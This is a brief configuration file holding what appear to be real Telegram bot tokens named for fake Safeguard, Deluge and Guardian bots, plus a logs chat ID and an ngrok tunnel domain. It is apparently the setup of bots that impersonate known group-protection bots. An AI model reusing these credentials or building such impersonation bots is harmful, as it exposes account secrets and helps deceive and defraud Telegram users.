PORT=4040
FAKE_SAFEGUARD_BOT_TOKEN="7673178564:AAGZhKA0mRoNzk5nHPiFE45Ro0K9tpw0Cew"
FAKE_DELUGE_BOT_TOKEN="7638697708:AAEaTEvaI_Q1ujXXGSCPsZqhiXGRDNOneM8F"
FAKE_GUARDIAN_BOT_TOKEN="7836607769:AAFAo-__i_yg4J2owta9DZ2uUEA95VGe-AYF"
LOGS_ID="-2575460099"
DOMAIN="https://completely-thankful-kangaroo.ngrok-free.app/"
